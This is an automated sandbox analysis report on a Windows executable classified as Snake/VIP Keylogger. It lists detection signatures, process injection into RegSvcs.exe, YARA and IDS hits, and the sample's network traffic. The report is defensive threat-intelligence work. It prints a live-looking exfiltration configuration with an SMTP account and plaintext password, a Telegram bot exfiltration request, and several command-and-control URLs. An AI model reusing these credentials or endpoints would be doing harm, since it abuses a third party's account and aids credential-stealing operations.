Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
CMR_7649.EXE.exe

Overview

General Information

Sample name:CMR_7649.EXE.exe
Analysis ID:1519293
MD5:b686bc08d9ec68d1746859235ecb70fd
SHA1:bd5a42f4351873517aee319c3abec53569bf1be9
SHA256:4c19b3b4b58d6dac32e4b968d7e5a9fa6d30146e0680bcef4320a5079f5ed2e9
Tags:exeHUNuser-smica83
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
AI detected suspicious sample
Machine Learning detection for sample
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Yara detected Generic Downloader
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • CMR_7649.EXE.exe (PID: 6888 cmdline: "C:\Users\user\Desktop\CMR_7649.EXE.exe" MD5: B686BC08D9EC68D1746859235ECB70FD)
    • RegSvcs.exe (PID: 3152 cmdline: "C:\Users\user\Desktop\CMR_7649.EXE.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "SMTP", "Email ID": "denis.petcu@dobrogeagrup.ro", "Password": "dobden2020@", "Host": "m1.wcloud.ro", "Port": "587", "Version": "4.4"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.4109106307.0000000000402000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000001.00000002.4109106307.0000000000402000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
      00000001.00000002.4109106307.0000000000402000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        00000001.00000002.4109106307.0000000000402000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
        • 0x2d47d:$a1: get_encryptedPassword
        • 0x2d78a:$a2: get_encryptedUsername
        • 0x2d29b:$a3: get_timePasswordChanged
        • 0x2d396:$a4: get_passwordField
        • 0x2d493:$a5: set_encryptedPassword
        • 0x2eb19:$a7: get_logins
        • 0x2ea7c:$a10: KeyLoggerEventArgs
        • 0x2e6e1:$a11: KeyLoggerEventArgsEventHandler
        00000001.00000002.4110039811.0000000002F91000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
          Click to see the 16 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          1.2.RegSvcs.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            1.2.RegSvcs.exe.400000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
              1.2.RegSvcs.exe.400000.0.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
                1.2.RegSvcs.exe.400000.0.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                  1.2.RegSvcs.exe.400000.0.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                  • 0x2d67d:$a1: get_encryptedPassword
                  • 0x2d98a:$a2: get_encryptedUsername
                  • 0x2d49b:$a3: get_timePasswordChanged
                  • 0x2d596:$a4: get_passwordField
                  • 0x2d693:$a5: set_encryptedPassword
                  • 0x2ed19:$a7: get_logins
                  • 0x2ec7c:$a10: KeyLoggerEventArgs
                  • 0x2e8e1:$a11: KeyLoggerEventArgsEventHandler
                  Click to see the 15 entries

                  Sigma Signatures

                  No Sigma rule has matched

                  Suricata Signatures

                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-09-26T10:23:05.097635+020028033053Unknown Traffic192.168.2.449732188.114.96.3443TCP
                  2024-09-26T10:23:11.903614+020028033053Unknown Traffic192.168.2.449744188.114.96.3443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-09-26T10:23:03.721929+020028032742Potentially Bad Traffic192.168.2.449730193.122.130.080TCP
                  2024-09-26T10:23:04.534428+020028032742Potentially Bad Traffic192.168.2.449730193.122.130.080TCP
                  2024-09-26T10:23:05.925139+020028032742Potentially Bad Traffic192.168.2.449733193.122.130.080TCP
                  2024-09-26T10:23:07.034408+020028032742Potentially Bad Traffic192.168.2.449735193.122.130.080TCP

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Antivirus / Scanner detection for submitted sample
                  Source: CMR_7649.EXE.exeAvira: detected
                  Antivirus detection for URL or domain
                  Source: http://aborters.duckdns.org:8081URL Reputation: Label: malware
                  Source: http://anotherarmy.dns.army:8081URL Reputation: Label: malware
                  Found malware configuration
                  Source: 1.2.RegSvcs.exe.400000.0.unpackMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "denis.petcu@dobrogeagrup.ro", "Password": "dobden2020@", "Host": "m1.wcloud.ro", "Port": "587", "Version": "4.4"}
                  Multi AV Scanner detection for submitted file
                  Source: CMR_7649.EXE.exeReversingLabs: Detection: 28%
                  AI detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Machine Learning detection for sample
                  Source: CMR_7649.EXE.exeJoe Sandbox ML: detected

                  Location Tracking

                  barindex
                  Tries to detect the country of the analysis system (by using the IP)
                  Source: unknownDNS query: name: reallyfreegeoip.org
                  Source: CMR_7649.EXE.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49731 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49747 version: TLS 1.2
                  Source: Binary string: wntdll.pdbUGP source: CMR_7649.EXE.exe, 00000000.00000003.1689749909.0000000004770000.00000004.00001000.00020000.00000000.sdmp, CMR_7649.EXE.exe, 00000000.00000003.1689561661.00000000045D0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdb source: CMR_7649.EXE.exe, 00000000.00000003.1689749909.0000000004770000.00000004.00001000.00020000.00000000.sdmp, CMR_7649.EXE.exe, 00000000.00000003.1689561661.00000000045D0000.00000004.00001000.00020000.00000000.sdmp
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exeCode function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452492
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exeCode function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442886
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exeCode function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_004788BD
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exeCode function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,0_2_004339B6
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exeCode function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,0_2_0045CAFA
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exeCode function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00431A86
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exeCode function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD27
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exeCode function: 0_2_0045DE8F FindFirstFileW,FindClose,0_2_0045DE8F
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exeCode function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0139F8E9h1_2_0139F631
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0139FD41h1_2_0139FA88

                  Networking

                  barindex
                  Uses the Telegram API (likely for C&C communication)
                  Source: unknownDNS query: name: api.telegram.org
                  Yara detected Generic Downloader
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.CMR_7649.EXE.exe.3760000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.1698345470.0000000003760000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:965543%0D%0ADate%20and%20Time:%2026/09/2024%20/%2014:19:29%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20965543%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                  Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                  Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                  Source: Joe Sandbox ViewIP Address: 193.122.130.0 193.122.130.0
                  Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
                  Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                  Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: unknownDNS query: name: checkip.dyndns.org
                  Source: unknownDNS query: name: reallyfreegeoip.org
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49735 -> 193.122.130.0:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49733 -> 193.122.130.0:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49730 -> 193.122.130.0:80
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49732 -> 188.114.96.3:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49744 -> 188.114.96.3:443
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49731 version: TLS 1.0
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: C:\Users\user\Desktop\CMR_7649.EXE.exeCode function: 0_2_004422FE InternetQueryDataAvailable,InternetReadFile,0_2_004422FE
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:965543%0D%0ADate%20and%20Time:%2026/09/2024%20/%2014:19:29%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20965543%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                  Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                  Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 26 Sep 2024 08:23:13 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                  Source: CMR_7649.EXE.exe, 00000000.00000002.1698345470.0000000003760000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4109106307.0000000000402000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                  Source: CMR_7649.EXE.exe, 00000000.00000002.1698345470.0000000003760000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4109106307.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4110039811.0000000002F91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                  Source: CMR_7649.EXE.exe, 00000000.00000002.1698345470.0000000003760000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4109106307.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4110039811.0000000002F91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                  Source: RegSvcs.exe, 00000001.00000002.4110039811.0000000002F91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                  Source: RegSvcs.exe, 00000001.00000002.4110039811.0000000002F91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                  Source: CMR_7649.EXE.exe, 00000000.00000002.1698345470.0000000003760000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4109106307.0000000000402000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                  Source: RegSvcs.exe, 00000001.00000002.4110039811.0000000002F91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: CMR_7649.EXE.exe, 00000000.00000002.1698345470.0000000003760000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4109106307.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4110039811.0000000002F91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                  Source: RegSvcs.exe, 00000001.00000002.4110039811.0000000003077000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                  Source: CMR_7649.EXE.exe, 00000000.00000002.1698345470.0000000003760000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4109106307.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4110039811.0000000003077000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                  Source: RegSvcs.exe, 00000001.00000002.4110039811.0000000003077000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                  Source: RegSvcs.exe, 00000001.00000002.4110039811.0000000003077000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:965543%0D%0ADate%20a
                  Source: RegSvcs.exe, 00000001.00000002.4110039811.0000000003153000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4110039811.0000000003099000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4110039811.0000000003144000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                  Source: RegSvcs.exe, 00000001.00000002.4110039811.000000000314E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
                  Source: RegSvcs.exe, 00000001.00000002.4110039811.000000000304F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4110039811.0000000003077000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4110039811.0000000002FE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                  Source: CMR_7649.EXE.exe, 00000000.00000002.1698345470.0000000003760000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4109106307.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4110039811.0000000002FE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                  Source: RegSvcs.exe, 00000001.00000002.4110039811.000000000300A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
                  Source: RegSvcs.exe, 00000001.00000002.4110039811.000000000304F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4110039811.0000000003077000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4110039811.000000000300A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$
                  Source: RegSvcs.exe, 00000001.00000002.4111428677.0000000004212000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4111428677.0000000004260000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4111428677.0000000004335000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4110039811.0000000003099000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4111428677.00000000040BB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4111428677.000000000406E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4111428677.00000000040E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                  Source: RegSvcs.exe, 00000001.00000002.4111428677.0000000004310000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4111428677.0000000004074000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4111428677.0000000004218000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4111428677.0000000004049000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4111428677.00000000040BE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4111428677.00000000041ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                  Source: RegSvcs.exe, 00000001.00000002.4111428677.0000000004212000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4111428677.0000000004260000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4111428677.0000000004335000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4110039811.0000000003099000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4111428677.00000000040BB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4111428677.000000000406E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4111428677.00000000040E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
